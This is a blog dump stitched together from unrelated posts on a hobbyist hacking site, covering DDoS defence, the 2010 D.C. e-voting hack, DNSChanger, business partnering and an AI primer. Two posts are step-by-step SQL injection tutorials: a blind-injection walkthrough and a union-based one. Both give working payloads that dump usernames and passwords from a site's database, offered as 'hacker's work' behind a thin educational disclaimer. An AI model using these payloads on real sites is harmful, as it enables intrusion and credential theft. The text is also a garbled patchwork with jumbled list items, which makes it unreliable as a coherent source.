Understanding DDOS Attack

What is DDos Attack ?

Compromised PCs, or “bots,” are formed into groups called “botnets” and are used as weapons by cyber-attackers to launch various forms of cyber attacks. These attacks range widely from DDoS to identity theft and clandestine intelligence gathering operations.
During Distributed Denial of Service attempts, attackers launch attacks using different techniques including HTTP, HTTPS, ICMP, SYN Floods, UDP Floods, DNS Request Floods, GET Floods, and others. The attack components are often used in combination, and range in size from a few hundred megabits per second (Mbps) to over 80 gigabits per second (Gbps). Increasingly sophisticated attacks are based around application requests at Layer-7.

Normally, DDOS consists of 3 parts . One is the Master ,Other the slave and atlast the victim. The master is the attack launcher ie the person/machine behind all this,sound’s COOL right . The slave is the network which is being compromised by the Master and Victim is the target site/server . Master informs the compromised machines, so called slaves to launch attack on the victim’s site/machine. Hence its also called co-ordinated attack.

How do they Do it ?

DDOS is done in 2 phases. In the first phase they try to compromise weak machines in different networks around the world. This phase is called Intrusion Phase. Its in the next phase that they install DDOS tools and starts attacking the victims machines/site. This Phase is called Distributed DoS attacks phase.

What Allowed them to Do ?

1. Vulnerable softwares/Applications running on a machine or network.
2. Open network setup.
3. Network/ machine setup without taking security into account.
4. No monitoring or DataAnalysis are being conducted.
5. No regular Audit / Software upgrades being conducted.

First Identify if you are really under attack. If yes, follow the below steps :

• Check if your machines load is high and you have large number of HTTP process running.

To find the load just use the command w or uptime -

–

Eg:

falgun@localhost>w 12:00:36 up 1 day, 20:27, 5 users, load average: 0.70, 0.70, 0.57

USER XYZ FROM LOGIN@ IDLE JCPU PCPU WHAT

–

To find if there is large number of HTTP process running use the command ” ps -aux|grep HTTP|wc -l ”

–

Eg:

[falgun@localhost]# ps -aux|grep HTTP|wc -l

23

–

In a heavy server , the number of connection will go above 100. But during DDOS attack, the number will go even higher and thats when we need to find out from which all networks are these attacks coming. In DDOS the host machine doesn’t have much importance. Its the network which is of importance here because, an attacker will use any machine on the compromised network or even will use all the machines in the network. Hence network address is of importance while fighting with the attack.

However, there are some actions you can take to protect yourself. Here's some basic advice:

• Ensure that you have adequate bandwidth on your Internet connection. You'll be able to foil many low-scale DDoS attacks by simply having enough bandwidth (and processing power) to service the requests.
• Deploy an intrusion prevention system on your network. Some (but definitely not all) DDoS attacks have recognizable signatures that an IPS can detect and use to prevent the requests from reaching the Web server.
• Use a DDoS prevention appliance, including any of the Cisco Systems Inc. Cisco Guard products, that is specifically designed to identify and thwart distributed denial-of-service attacks.
• Maintain a backup Internet connection with a separate pool of IP addresses for critical users. While you won't be able to switch all access to your website over to a backup connection (the attacks will switch at the same time!), you can provide critical users with an alternate path to your site if the primary circuit is swamped with bogus requests.

These tips should get you started on the road toward building a hardy Web infrastructure with the highest probability of surviving a DDoS attack. Good luck!

Small Coding Mistake Lead to an Internet Voting System Failure

The main security weakness that let University of Michigan researchers take control over a planned city of Washington, D.C. Internet voting system pilot for overseas voters in 2010 was "a tiny oversight in a single line of code," the researchers say in a new paper (.pdf) detailing their exploits. City officials canceled the pilot shortly before the November election after the hack was revealed.

It's evidence, say the researchers--led by Assistant Professor J. Alex Halderman--that Internet voting should be postponed until, when or if major new breakthroughs in cybersecurity occur. Mistakes like the one they exploited are all too common, hard to eradicate, and indicative of a brittleness in web applications, they say. Seemingly trivial errors can result in attackers gaining system dominance--and in the case of an internet voting system, controlling the outcome of an election.  

Responding to a call by Washington, D.C., election officials for outsiders with no previous access to test system security, Halderman and his students penetrated the pilot system within 48 hours of it going online. Their successful attack went undetected for another 36 hours, they say, despite the fact that they left a calling card in the form of having the vote confirmation screen to play the University of Michigan fight song after 15 seconds. Even then, the detection didn't occur because D.C. officials spotted anomalies in intrusion detection system logs, or even stumbled on the fight song itself, but because someone on a mailing list monitored by the city asked, "does anyone know what tune they play for successful voters?"  

The main exploit researchers used was a shell-injection vulnerability done by uploading a fake ballot with a command function as the file extension. The file uploader plugin D.C. election officials used preserved the file extension and the command line interpreter executed the command, the paper says.

Attackers also found that a system firewall filtered outbound network traffic, but that they could steal data by sending files to the images directory on the compromised server and retrieving it with any HTTP client.

Once inside the application server, they retrieved the public key for encrypting ballots, proceeding to replace all encrypted stored ballot files with forged votes. They also modified the system so that new ballots were sent to a subfolder in the images directory and the new originals replaced with more forgeries.

They also managed to violate the secrecy of balloting, the paper says, since before ballots were encrypted, the file uploader placed them in a temporary directory. But, the web application didn't delete the unencrypted ballots. The files did not contain a voter's identification, but did display the precinct and time of voting, letting researchers compare them to server application logs and associate them with people's identities.

In maybe the greatest oversight of city officials, researchers also found in the temporary director a 937 page .pdf document containing real voters' credentials for using the system, meaning that attackers could have cast votes as those citizens in the real election.

"One small mistake in the configuration or implementation of the central voting servers or their surrounding network infrastructure can easily undermine the legitimacy of the entire election" they conclude.

For more:
- download the paper from J. Alex Halderman's website (.pdf)
Source - http://www.fiercegovernmentit.com/story/small-coding-mistake-led-big-internet-voting-system-failure/2012-02-22 - 

Blind SQL Injection Tutorial Illustrated

Blind injection is a little more complicated the classic injection but it can be done :D 

It's some what hard but good to Learn 

1) http://www.site.com/news.php?id=5

when we execute this, we see some page and articles on that page, pictures etc... then when we want to test it for blind sql injection attack

2) http://www.site.com/news.php?id=5 and 1=1 <--- this is always true

and the page loads normally, that's ok.now the real test

3) http://www.site.com/news.php?id=5 and 1=2 <--- this is false

so if some text, picture or some content is missing on returned page then that site is vulrnable to blind sql injection.Hacker's Work Started :) 

1) Get the MySQL version

to get the version in blind attack we use substring 

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=4

this should return TRUE if the version of MySQL is 4.replace 4 with 5, and if query return TRUE then the version is 5. 

i.e

http://www.site.com/news.php?id=5 and substring(@@version,1,1)=5

2) Test if subselect works 

when select don't work then we use subselect 

i.e

http://www.site.com/news.php?id=5 and (select 1)=1 

if page loads normally then subselects work.then we gonna see if we have access to mysql.user

i.e

http://www.site.com/news.php?id=5 and (select 1 from mysql.user limit 0,1)=1

if page loads normally we have access to mysql.user and then later we can pull some password usign load_file() function and OUTFILE.

3). Check table and column names.This is part when guessing is the best friend for Hacker ...

i.e.

http://www.site.com/news.php?id=5 and (select 1 from users limit 0,1)=1 (with limit 0,1 our query here returns 1 row of data, cause subselect returns only 1 row, this is very important.)

then if the page loads normally without content missing, the table users exits.

if you get FALSE (some article missing), just change table name until you guess the right one :)

let's say that we have found that table name is users, now what we need is column name. 

the same as table name, we start guessing. Like i said before try the common names for columns.

i.e.

http://www.site.com/news.php?id=5 and (select substring(concat(1,password),1,1) from users limit 0,1)=1

if the page loads normally we know that column name is password (if we get false then try common names or just guess) 

here we merge 1 with the column password, then substring returns the first character (,1,1)

4). Pull data from database

we found table users i columns username password so we gonna pull characters from that.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>80

ok this here pulls the first character from first user in table users. 

substring here returns first character and 1 character in length. ascii() converts that 1 character into ascii value and then compare it with simbol greater then > .

 so if the ascii char greater then 80, the page loads normally. (TRUE)

 we keep trying until we get false.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>95

we get TRUE, keep incrementing

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>98

TRUE again, higher

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

FALSE!!!

so the first character in username is char(99). Using the ascii converter we know that char(99) is letter 'c'.

then let's check the second character.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),2,1))>99

Note that i'm changed ,1,1 to ,2,1 to get the second character. (now it returns the second character, 1 character in lenght)

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>99

TRUE, the page loads normally, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>107

FALSE, lower number.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>104

TRUE, higher.

http://www.site.com/news.php?id=5 and ascii(substring((SELECT concat(username,0x3a,password) from users limit 0,1),1,1))>105

FALSE!!!

we know that the second character is char(105) and that is 'i'. We have 'ci' so far

 so keep incrementing until you get the end. (when >0 returns false we know that we have reach the end).

 There are some tools for Blind SQL Injection, i think sqlmap is the best, but i'm doing everything manually,

 cause that makes you better SQL INJECTOR :D

Hope You Learned alot from this and This is just for Educational Purpose.

Fake Access Point .... Pawning The System Part 1

A Very good video that i want to share with you guys its really interesting :) Just Enjoy making a Fake Access Point.
I got many mails and msg to post something related to Ethical Hacking and Cyber Security.

Requirements - BackTrack PenTest OS (download it from www.backtrack-linux.org )

AI - Artificial Intelligence an approach

WHAT IS ARTIFICIAL INTELLIGENCE?

Artificial Intelligence (AI) is the study and creation of computer systems that can perceive, reason and act. The primary aim of AI is to produce intelligent machines. The intelligence should be exhibited by thinking, making decisions, solving problems, more importantly by learning. AI is an interdisciplinary field that requires knowledge in computer science, linguistics, psychology, biology, philosopy and so on for serious research.

STRONG ARTIFICIAL INTELLIGENCE

It deals with creation of real intelligence artificially. Strong AI believes that machines can be made sentient or self-aware. There are two types of strong AI: Human-like AI, in which the computer program thinks and reasons to the level of human-being. Non-human-like AI, in which the computer program develops a non-human way of thinking and reasoning.

WEAK ARTIFICIAL INTELLIGENCE

Weak AI does not believe that creating human-level intelligence in machines is possible but AI techniques can be developed to solve many real-life problems.

AI AND NATURE

Nowadays AI techniques developed with the inspiration from nature is becoming popular. A new area of research what is known as Nature Inspired Computing is emerging. Biological inspired AI approaches such as neural networks and genetic algorithms are already in place.

CHALLENGES

It is true that AI does not yet achieve its ultimate goal. Still AI systems could not defeat even a three year old child on many counts: ability to recognize and remember different objects, adapt to new situations, understand and generate human languages, and so on. The main problem is that we, still could not understand how human mind works, how we learn new things, especially how we learn languages and reproduce them properly.

APPLICATIONS

There are many AI applications that we witness: Robotics, Machine translators, chatbots, voice recognizers to name a few. AI tehniques are used to solve many real life problems. Some kind of robots are helping to find land-mines, searching humans trapped in rubbles due to natural calamities.

FUTURE OF AI

AI is the best field for dreamers to play around. It must be evolved from the thought that making a human-machine is possible. Though many conclude that this is not possible, there is still a lot of research going on in this field to attain the final objective. There are inherent advantages of using computers as they do not get tired or loosing temper and are becoming faster and faster. Only time will say what will be the future of AI: will it attain human-level or above human-level intelligence or not.

This is just an Basic Concept that i want discuss with you guys for more resources

www.jair.org
http://www-formal.stanford.edu/jmc/whatisai/

Six Strategies for Partnering with Big Brands

Many of You People thinking That how to become a partner of Big Brands as it helps us alot to get a value and status in the Market.Same Study We are going to Discuss n this post.

The Trenton, N.J.-based company's first big partnership with Wal-Mart in Canada was just the start of what has become a $14 million business. TerraCycle now gathers unrecyclable trash and converts it into products and packaging for such big brands as Kraft, Pepsi and Mars. Last year, corporate partners spent $45 million on TerraCycle-related marketing--far more than Szaky could have ever done alone.

But breaking in with big companies is no easy feat. For Szaky, it took lots of research, persistence and trial and error. "The biggest mistake small companies make is they don't do enough homework," says Brant Slade, co-author of Think BIG!: An Entrepreneur's Guide to Partnering With Large Companies (Course Technology PTR, 2009). "They think … more from the small business point of view as opposed to thinking from the large business point of view.

Here's a checklist to help your small business prepare to partner with big brands:

1. Be unique. Make sure your business pitch is carefully thought out and offers value to your potential partner. After Robin Thurston co-founded MapMyFITNESS.com, an Austin, Texas-based fitness social network that offers online routes, training and group activities, he and his partner realized they had developed a geo-location technology that bigger companies wanting online fitness tools and access to a social network could use. With their first corporate partner, Cadbury's Accelorade sports drink, they collaborated on a web interface enabling users on their site to map and share workouts. "You have to have something that is clearly valuable to that big brand that they might not want to spend the time investing in or doing," Thurston says. Now, the company also builds web platforms and mobile phone apps for brands like NBC Sports, Humana and Skechers, whose customers can opt into the MapMyFITNESS social network.

2. Remain persistent. Although Szaky had the worm-excrement-in-a-recycled-bottle market cornered, getting that first deal with Wal-Mart in 2005 still required persistence. After scouring LinkedIn and alumni networks to find the right contact, Szaky called Wal-Mart 10 times a day, every day for three weeks until he finally got through and set up a meeting. Big companies field lots of requests, so persistence is a must. "There are some brands we are working with today that literally were five-year conversations," Thurston says.

4. Plan for fast growth. If you're growing too quickly to keep up with demand, you'll lose money--and probably your partner. Szaky learned that lesson through experience. "The more we grew, the more we lost," he says. While TerraCycle's sales reached $6.6 million in 2008, it had a net loss of $4.5 million. The next year, Szaky began developing agreements with companies to handle production for him. Today, 40 companies make and sell TerraCycle products for major retailers and TerraCycle turned a profit of $100,000 in the last year.3. Think big. You have to think like a big brand to partner with one. For MapMyFITNESS, that means developing large-scale projects. "A big brand doesn't want to talk about a $10,000 project," Thurston says. "They want to talk in seven figures and really big user numbers." For example, Thurston and his partner proposed that big companies give away their product with subscriptions to the MapMyFITNESS website. The size of their user base--nearly seven million today--was large enough to interest brands like Procter & Gamble's Febreze.

Polka Dog Bakery, a Boston-based dog treat maker slated to expand into 1,763 Target stores this May, let the retailer oversee production and distribution in order to make the partnership feasible. "It would have been too much for us to expand at that capacity," says cofounder Robert Van Sickle of his 11-person company.

5. Prepare for scrutiny. Make sure your financial and legal affairs are in order. Since TerraCycle works with multinational companies, the company gets audited every two months. After failing the first few audits in his early partnerships, Szaky realized he needed to focus more on developing proper procedures. "If you are going to go down the path of working in big businesses, having your house in order is critical," he says. "You are going to get the growth but you are also going to get a lot more scrutiny."

6. Build on existing partnerships. Don't rush to find the next partner once you successfully link up with a big company. MapMyFITNESS gets a lot of new business from expanding existing partnerships, Thurston says. Companies are often more willing to consider developing a licensing partnership, for example, if they're already buying advertising on your website. "Too many entrepreneurs chase after the next client instead of recognizing the current client could mean a lot more revenue for them if they simply explore other revenue channels," Thurston says. Partnerships now account for a third of his company's total revenue.

Hope Your Business will goes Well :) God Bless You

8th March Internet is going to be ShutDown ?

Security firm Internet Identity has revealed that more than half of all Fortune 500 companies and major U.S. federal agencies are infected with malware called DNSChanger. The company discovered that as of early January a minimum of 250 Fortune 500 companies had one or more computer or router infected with the malware, as did 27 out of 55 federal agencies. On November 9th The FBI annonced the arrest of six Estonian nationals in relation to DNSChanger, which was believed to have infected approximately four million computers globally — including 500,000 in the United States — and generated close to $14 million in illicit advertising money. According to the FBI, DNSChanger affected computers in two ways, both of which generated advertising revenue: click hijacking, in which users would click on a search result link and be re-routed to another site, producing per-click advertising payouts; as well as advertising replacement fraud, which would replace legitimate ads on a website with substitutes that would trigger payments.

During the arrests — known as Operation Ghost Click — the FBI seized a number of computer systems that were being used as rogue DNS servers. These weren't shut down but instead replaced with legitimate servers, however the legitimate servers were only a temporary solution put in place for 120 days, after which point the "internet may literally go dark" for the remaining infected computers, according to Internet Identity. There are reportedly still "millions" of PCs infected with the malware that could potentially go dark on March 8th if the FBI doesn't secure an extension for the replacement DNS servers.

A group called the DNS Changer Working Group — "an ad hoc group of subject matter experts" that consists of organizations like Georgia Tech, the University of Alabama at Birmingham, Trend Micro, Neustar, and more — is offering to identify infected IP addresses for free. The group's site offers tips on checking for DNSChanger on OSX, XP, Windows 7, and home routers, while larger organizations can email the group to see if any one of their network is infected.

Source - http://www.theverge.com/2012/2/17/2806752/dnschanger-malware-fortune-500-federal-agencies

Be an Writer for our Magazine on Information Technology

Be an Writer for our Magazine on Information Technology

The most important thing for us is your point of view in your interests' topics it will be the best way for creating good article.

For the article we need those including minimum 3500 words and 3 or more graphics/pictures. And deadline for First Issue of Magazine is 29 Feb.

Please don't forget to attach your short "authors bio" and your photo, and an advert of your company as well.

I'm sending you our expectation for the articles:

The article should be written specially for our Magazines covering all the Best topics given below

1) Hardware

2) Softwares

3) Networking

4) Internet

5) Programming

6) Ethical Hacking and Security

7) Mobile World

8) Miscealleneous

Articles should be based on your own experience or the field which you are interested in. It can also describe some new project you work up.

The article consists of:

* title
* lead (few sentences introducing the topic)
* introduction (in first sentences you write for a reader what he gets to know after reading your article and what skills he will be taught)
* body (describing the topic step by step)
* conclusion
* authors bio and her/his photo
* other materials if applicable
* 3 or more graphics


Note: Please Don't Copy and Pasted or a Don't be Leacher,The Article should be Interative with Reader in terms of content written.

Mail your article on cyberoctet@gmail.com and if any feel free to contact us on cyberoctet@gmail.com

Beginners Tutorial of SQL Injection

While on the way to Bangalore I decided to post a basic tut for SQL Injection as normally people having knowledge of sqlijection call themselves as Hackers but its not so SQL Injection is just a Trailer I will suggest you for other injection also :) so now lets learn .

SQL Injection

“SQL injection is a type of vulnerability in which the attacker adds SQL statements through a web application's input fields or hidden parameters to gain access to resources or make changes to data.” A resource field is usually considered a column in a database that holds important data about an organization. Validation is key to making sure these SQL statements don’t contain criminal code necessary to illegally obtain unauthorized information. This can be done using any database, as no any one vendor is exempt. “SQL injection is not a defect of Microsoft SQL Server – it is also a problem for every other database vendor as well.” Let’s take a look at how SQL injection works by looking at a simple database with user names and passwords. In a normal database, the table named “Login” would look like Table as given below.

Command	Function
SELECT	Selects rows (records)
INSERT INTO	Inserts rows (records)
DELETE	Deletes rows (records)
UPDATE	Changes rows (records)
CREATE TABLE	Creates a new table

The database is not the only entity that can be affected here; the criminal can also access the network as well as the operating system at this point. SQL statements can be written to bypass the signatures of intrusion detection systems; however the discussion of this goes beyond the scope of this paper. The best defense is to check all input and validate at all tiers

Example

SQL Injection attacks are code injections that exploit the database layer of the application. This is most commonly the MySQL database, but there are techniques to carry out this attack in other databases such as Oracle. In this tutorial i will be showing you the steps to carry out the attack on a MySQL Database.

Step 1:

When testing for SQL Injection vulnerabilities, you need to find a page that looks like this:

www.site.com/id=1

Basically the site needs to have an = then a number or a string, but most commonly a number. Once you have found a page like this, we test for vulnerability by simply entering a ' after the number in the url. For example:

www.site.com/id=1'

If the database is vulnerable, the page will give an error or blank page.

If the page loads as normal then the database is not vulnerable, and the website is not vulnerable to SQL Injection.

Step 2

Now we need to find the number of union columns in the database. We do this using the "order by" command. We do this by entering "order by 1--", "order by 2--" and so on until we receive a page error. For example:

http://www.site.com/id=1 order by 1--

http://www.site.com/id=1 order by 2--

http://www.site.com/id=1 order by 3--

http://www.site.com/id=1 order by 4--

http://www.site.com/id=1 order by 5--

If we receive an error here, then that means we have 4 columns.

Step 3

We now are going to use the "union" command to find the vulnerable columns.

for example:

www.site.com/page=1 union all select 1,2,3,4--

Suppose 2 is shown then our targated column is 2

Step 4

We now need to find the database version. We do this by replacing the vulnerable column numbers with the following query:

For example the url would look like:

www.site.com/page=1 union all select 1,version(),3,4--

or

www.site.com/page=1 union all select 1,@@version,3,4--

The resulting page would then show the database user and then the MySQL version. For example 5.0.83.

Step 5

In this step our aim is to list all the table names in the database.

www.site.com/page=1 UNION SELECT 1,table_name,3,4 FROM information_schema.tables--

Now look for admin tables or member or user tables.

Step 6

In this Step we want to list all the column names in the table we have found for example 'admin', to do this we use the following command:

www.site.com/page=1 union all select 1,2,group_concat(column_name),4 from information_schema.columns where table_name='admin'--

This command makes the page spit out ALL the column names in the database. So again, look for interesting names such as user, email and password.

Step 7

Finally we need to dump the data, so say we want to get the "username" and "password" fields, from table "admin" we would use the following command,

www.site.com/page=1 union all select 1,2,group_concat(username,0x3a,password),4 from admin--

Here the "concat" command matches up the username with the password so you don’t have to guess, if this command is successful then you should be presented with a page full of usernames and passwords from the website.

This Tut is just for Knowledge purpose not to Harm. If anyone Does than Responsibility is all yours :)

Cheers ....

Why 2012 Will Be a Year of Cyber Crime "a Cyber Doom Year"

For online security professionals, 2012 is turning out to be a banner year. Prominent hacks are taking place nearly every week. Credit card fraud and piracy on the Internet are booming. Hacktivist attacks against government computers and private companies are occurring almost daily. Big-name government agencies and businesses everywhere are shelling out for security assistance ... but for everyday Internet users, it's a giant headache with unclear risks.

The one thing no one is really able to explain is why cybercrime's booming. According to a recent Norton Study, cybercrime cost the global economy (in both direct damage and lost productivity time) $388 billion in 2011--significantly more than the global black market for marijuana, cocaine, and heroin combined. Officials at the Department of Homeland Security have reported exponentially increasing demand for cybercrime assistance --something confirmed by this reporter in anecdotal discussions with online security experts.

Every single expert has a different theory. Some say it's due to a global economy that's putting programmers out of work and turning them rogue. Others say it's the easy availability of computers in poor regions of the world where job prosects are few. Then others say it's simply that scripts and DDoS attacks have democratized cybercrime.

DDoS attacks--and their first cousins, botnets--are one of the biggest culprits. Most DDoS attacks are amazingly simplistic; they are denial-of-service attacks frequently made via software that requires no programming or IT knowledge. Botnets are impromptu networks of Internet-connected computers turned rogue via malware. Once a computer is compromised, they can be used for everything from financial fraud to knocking websites offline. Reached by email, Carl Herberger of security firm Radware put much of the blame on hacktivists such as Anonymous.

"The motive for attacks has changed and this new motive brought with it new tools and attack techniques," Herberger tells Fast Company. "These new motives--frequently called 'Hacktivism'--are in a new category which will go down in the record books as one of the most active periods of cyberattacks in the history of information security. Given the current efficacy of ideologically-based multi-vulnerability attacks such as WikiLeaks revenge attacks of 2010 and the Sony attacks of 2011, we believe this will only serve to encourage even more actors to enter the picture and spawn a vicious cycle of future malicious activity.”

While the idea that politicized groups such as Anonymous are malicious and/or criminals is controversial, many security experts agree with Herberger. At the recent Kaspersky Lab Cyber Conference in Cancun, CEO Eugene Kaspersky compared hacktivists to radicals who plant car bombs and commit arsons in the name of ideology. Similar alarms were raised in an end-of-year letter from risk management firm Stroz Friedberg, which largely conflated hacktivism with threats like state-sponsored data theft and zero-day exploits.

As for state-sponsored data theft, the New York Times just reported on the lengths to which American companies go to avoid Chinese Cyber Espionage American businesspeople, consultants, and politicians working in China avoid bringing their work computers into the country and use throwaway mobile phones--to name the most common tricks--in order to avoid the loss of business secrets to state-sponsored corporate spies. While China is the most blatant nation-state to engage in spying on foreign businesses for the benefit of homegrown companies, it isn't uncommon. Russia, France, Israel, Taiwan, and others have also been alleged to engage in the process.

Still The World of Malware,Bots, Cyber Espionage, Piracy and many more has become a center of attraction.

Stay Safe

Thanks to - NEAL UNGERLEIDER for this wonderful article